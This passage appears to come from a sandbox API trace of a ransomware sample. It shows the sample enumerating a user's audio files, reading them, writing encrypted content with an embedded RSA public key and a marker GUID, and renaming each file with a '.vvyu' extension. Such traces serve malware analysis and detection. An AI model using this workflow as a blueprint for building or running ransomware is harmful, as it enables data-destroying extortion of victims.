hHeap=0x2c0000) returned 1 [0197.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.794] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1461e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1461e, lpOverlapped=0x0) returned 1 [0197.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.795] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14623, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.795] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.797] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.797] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.797] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.797] CloseHandle (hObject=0x584) returned 1 [0197.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0197.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0197.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0197.803] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\ah3jWN0.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\ah3jwn0.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\ah3jWN0.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\ah3jwn0.wav.vvyu")) returned 1 [0197.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.807] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0197.810] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11071cb0, ftCreationTime.dwHighDateTime=0x1d8983f, ftLastAccessTime.dwLowDateTime=0xd1e8c170, ftLastAccessTime.dwHighDateTime=0x1d89913, ftLastWriteTime.dwLowDateTime=0xd1e8c170, ftLastWriteTime.dwHighDateTime=0x1d89913, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AZ2aRaMGzQB", cAlternateFileName="AZ2ARA~1")) returned 1 [0197.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0197.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x371e70 [0197.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x29f8628 [0197.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x371e70 | out: hHeap=0x2c0000) returned 1 [0197.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0197.810] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd958b50, ftCreationTime.dwHighDateTime=0x1d89a35, ftLastAccessTime.dwLowDateTime=0x1e167f40, ftLastAccessTime.dwHighDateTime=0x1d8a294, ftLastWriteTime.dwLowDateTime=0x1e167f40, ftLastWriteTime.dwHighDateTime=0x1d8a294, nFileSizeHigh=0x0, nFileSizeLow=0xccd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dVUUTI6.wav", cAlternateFileName="")) returned 1 [0197.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0197.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.811] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\dVUUTI6.wav") returned=".wav" [0197.811] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\dVUUTI6.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\dvuuti6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.811] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=3277) returned 1 [0197.811] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.815] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xca7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.815] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.818] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.818] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xccd, lpOverlapped=0x0) returned 1 [0197.818] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.818] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.818] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.819] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0197.820] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.820] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.820] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.820] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.820] GetLastError () returned 0x0 [0197.820] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.820] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0197.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.821] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.821] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.821] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xcd0) returned 0x2ade6e0 [0197.821] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf3b8 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea8d8 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea920 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.822] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2adf5b0 [0197.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0197.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf5b0 | out: hHeap=0x2c0000) returned 1 [0197.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6830 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6818 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0197.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0197.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.826] GetCurrentThreadId () returned 0x5d8 [0197.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2b70 [0197.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0197.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0197.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.827] GetCurrentThreadId () returned 0x5d8 [0197.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0197.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0197.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0197.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6830 [0197.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6890 [0197.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68a8 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6848 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6818 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf5b0 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0197.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0197.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2adf7c0 [0197.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2adf9d8 [0197.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.833] RtlAllocateHeap 